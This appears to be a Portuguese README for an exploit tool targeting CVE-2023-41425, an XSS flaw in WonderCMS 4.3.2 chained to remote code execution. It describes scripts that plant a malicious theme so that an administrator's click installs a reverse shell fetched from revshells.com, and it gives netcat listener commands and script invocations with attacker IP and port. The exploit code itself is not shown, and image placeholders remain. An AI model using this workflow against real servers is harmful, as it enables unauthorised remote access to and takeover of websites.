
CVE-2023-41425 Refurbish
Estes scripts exploram uma vulnerabilidade XSS (Cross-Site Scripting) no WonderCMS 4.3.2 para alcançar Execução Remota de Código (RCE). O payload XSS, quando acionado pelo administrador, instala automaticamente um reverse shell no servidor alvo, aproveitando um módulo de tema malicioso personalizado. O reverse shell é obtido do revshells.com e executado, concedendo ao atacante acesso remoto ao servidor.
Para executar com sucesso qualquer um dos scripts, as seguintes ferramentas e condições são necessárias:
Pasted image 20241010021603
Esta versão da exploração verifica automaticamente se há um listener nc ativo, baixa o reverse shell, inicia o servidor HTTP, envia o payload e aguarda que o administrador acione o reverse shell.
nc está em execução na porta especificada:
nc -nvlp <PORT>
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.Pasted image 20241010013048
Use o exploit fornecido pelo script no campo Website...
Pasted image 20241010013218
Esta versão exige que o usuário gerencie manualmente o listener nc e o acionamento do payload XSS. É mais adequada para cenários onde processos automáticos não são desejáveis.
nc está em execução na porta especificada:
nc -nvlp <PORT>
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.